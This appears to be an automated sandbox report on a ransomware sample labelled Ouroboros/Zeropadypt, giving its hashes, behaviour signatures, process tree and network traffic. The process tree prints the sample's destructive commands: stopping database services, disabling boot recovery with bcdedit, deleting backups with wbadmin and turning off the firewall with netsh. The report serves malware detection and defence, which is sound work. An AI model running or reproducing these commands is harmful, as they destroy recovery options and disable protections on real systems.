Analysis

  • max time kernel
    179s
  • max time network
    167s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    12-02-2022 00:24

General

  • Target

    bb51eef3e46dc4ebf041dd7ac6e717d36eea57ca3acc88efad65fa3cb06081ee.exe

  • Size

    994KB

  • MD5

    043051032c01d2d5e7dc0a180eab52f0

  • SHA1

    6a708fc95a1b0d0f60b5674b652e27b52db2fbbd

  • SHA256

    bb51eef3e46dc4ebf041dd7ac6e717d36eea57ca3acc88efad65fa3cb06081ee

  • SHA512

    754d42a6600cfd11999b7e7a2cd771c62e42d8cd581a621cae764c245cc68af1b56c554704ea81cb0b17059bf94bf0a17798e14f26732840cb74a74a390b2537

Malware Config

Signatures

  • Ouroboros/Zeropadypt

    Ransomware family based on open-source CryptoWire.

  • Modifies Windows Firewall 1 TTPs
  • Drops desktop.ini file(s) 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 8 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bb51eef3e46dc4ebf041dd7ac6e717d36eea57ca3acc88efad65fa3cb06081ee.exe
    "C:\Users\Admin\AppData\Local\Temp\bb51eef3e46dc4ebf041dd7ac6e717d36eea57ca3acc88efad65fa3cb06081ee.exe"
    1⤵
    • Drops desktop.ini file(s)
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3600
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c net stop SQLWriter
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1248
      • C:\Windows\SysWOW64\net.exe
        net stop SQLWriter
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4060
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop SQLWriter
          4⤵
            PID:2216
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c net stop SQLBrowser
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2264
        • C:\Windows\SysWOW64\net.exe
          net stop SQLBrowser
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2852
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop SQLBrowser
            4⤵
              PID:4216
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c net stop MSSQLSERVER
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2648
          • C:\Windows\SysWOW64\net.exe
            net stop MSSQLSERVER
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4408
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop MSSQLSERVER
              4⤵
                PID:1420
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c net stop MSSQL$CONTOSO1
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4404
            • C:\Windows\SysWOW64\net.exe
              net stop MSSQL$CONTOSO1
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:116
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop MSSQL$CONTOSO1
                4⤵
                  PID:3664
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c net stop MSDTC
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:3632
              • C:\Windows\SysWOW64\net.exe
                net stop MSDTC
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3332
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop MSDTC
                  4⤵
                    PID:4380
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
                2⤵
                  PID:4328
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled no
                  2⤵
                    PID:4592
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c wbadmin delete catalog -quiet
                    2⤵
                      PID:4568
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c net stop SQLSERVERAGENT
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4956
                      • C:\Windows\SysWOW64\net.exe
                        net stop SQLSERVERAGENT
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2052
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop SQLSERVERAGENT
                          4⤵
                            PID:3696
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c net stop MSSQLSERVER
                        2⤵
                          PID:4712
                          • C:\Windows\SysWOW64\net.exe
                            net stop MSSQLSERVER
                            3⤵
                              PID:1872
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop MSSQLSERVER
                                4⤵
                                  PID:4272
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c net stop vds
                              2⤵
                                PID:3260
                                • C:\Windows\SysWOW64\net.exe
                                  net stop vds
                                  3⤵
                                    PID:1008
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop vds
                                      4⤵
                                        PID:2160
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c netsh advfirewall set currentprofile state off
                                    2⤵
                                      PID:704
                                      • C:\Windows\SysWOW64\netsh.exe
                                        netsh advfirewall set currentprofile state off
                                        3⤵
                                          PID:1460
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c netsh firewall set opmode mode=disable
                                        2⤵
                                          PID:1304
                                          • C:\Windows\SysWOW64\netsh.exe
                                            netsh firewall set opmode mode=disable
                                            3⤵
                                              PID:1216
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                          1⤵
                                          • Drops file in Windows directory
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4084
                                        • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                          C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                          1⤵
                                          • Drops file in Windows directory
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3112

                                        Network

                                        • flag-us
                                          DNS
                                          www.sfml-dev.org
                                          bb51eef3e46dc4ebf041dd7ac6e717d36eea57ca3acc88efad65fa3cb06081ee.exe
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          www.sfml-dev.org
                                          IN A
                                          Response
                                          www.sfml-dev.org
                                          IN CNAME
                                          sfml-dev.org
                                          sfml-dev.org
                                          IN A
                                          78.47.82.133
                                        • flag-de
                                          GET
                                          http://www.sfml-dev.org/ip-provider.php
                                          bb51eef3e46dc4ebf041dd7ac6e717d36eea57ca3acc88efad65fa3cb06081ee.exe
                                          Remote address:
                                          78.47.82.133:80
                                          Request
                                          GET /ip-provider.php HTTP/1.0
                                          content-length: 0
                                          from: user@sfml-dev.org
                                          host: www.sfml-dev.org
                                          user-agent: libsfml-network/2.x
                                          Response
                                          HTTP/1.1 200 OK
                                          Date: Sat, 12 Feb 2022 00:25:21 GMT
                                          Server: Apache
                                          Content-Security-Policy: default-src 'none'; script-src 'self' 'unsafe-eval' 'unsafe-inline' *.sfml-dev.org www.gstatic.com www.google.com www.google-analytics.com ssl.google-analytics.com; connect-src 'self' www.google-analytics.com; img-src 'self' https: data:; style-src 'self' 'unsafe-inline' *.sfml-dev.org fonts.googleapis.com; media-src https: data:; font-src 'self' fonts.gstatic.com; base-uri 'self'; form-action 'self'; frame-src https: data:
                                          Content-Length: 12
                                          Connection: close
                                          Content-Type: text/html; charset=UTF-8
                                        • 93.184.220.29:80
                                          46 B
                                          40 B
                                          1
                                          1
                                        • 72.21.81.240:80
                                          322 B
                                          7
                                        • 72.21.81.240:80
                                          322 B
                                          7
                                        • 51.132.193.105:443
                                          40 B
                                          1
                                        • 78.47.82.133:80
                                          http://www.sfml-dev.org/ip-provider.php
                                          http
                                          bb51eef3e46dc4ebf041dd7ac6e717d36eea57ca3acc88efad65fa3cb06081ee.exe
                                          364 B
                                          829 B
                                          5
                                          5

                                          HTTP Request

                                          GET http://www.sfml-dev.org/ip-provider.php

                                          HTTP Response

                                          200
                                        • 172.98.203.175:80
                                          bb51eef3e46dc4ebf041dd7ac6e717d36eea57ca3acc88efad65fa3cb06081ee.exe
                                          260 B
                                          5
                                        • 172.98.203.178:80
                                          bb51eef3e46dc4ebf041dd7ac6e717d36eea57ca3acc88efad65fa3cb06081ee.exe
                                          260 B
                                          5
                                        • 10.127.1.168:8080
                                          bb51eef3e46dc4ebf041dd7ac6e717d36eea57ca3acc88efad65fa3cb06081ee.exe
                                        • 8.8.8.8:53
                                          www.sfml-dev.org
                                          dns
                                          bb51eef3e46dc4ebf041dd7ac6e717d36eea57ca3acc88efad65fa3cb06081ee.exe
                                          62 B
                                          92 B
                                          1
                                          1

                                          DNS Request

                                          www.sfml-dev.org

                                          DNS Response

                                          78.47.82.133

                                        MITRE ATT&CK Enterprise v6

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • memory/4084-131-0x0000025816380000-0x0000025816390000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/4084-130-0x0000025816320000-0x0000025816330000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/4084-132-0x0000025818A60000-0x0000025818A64000-memory.dmp

                                          Filesize

                                          16KB

                                        We care about your privacy.

                                        This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.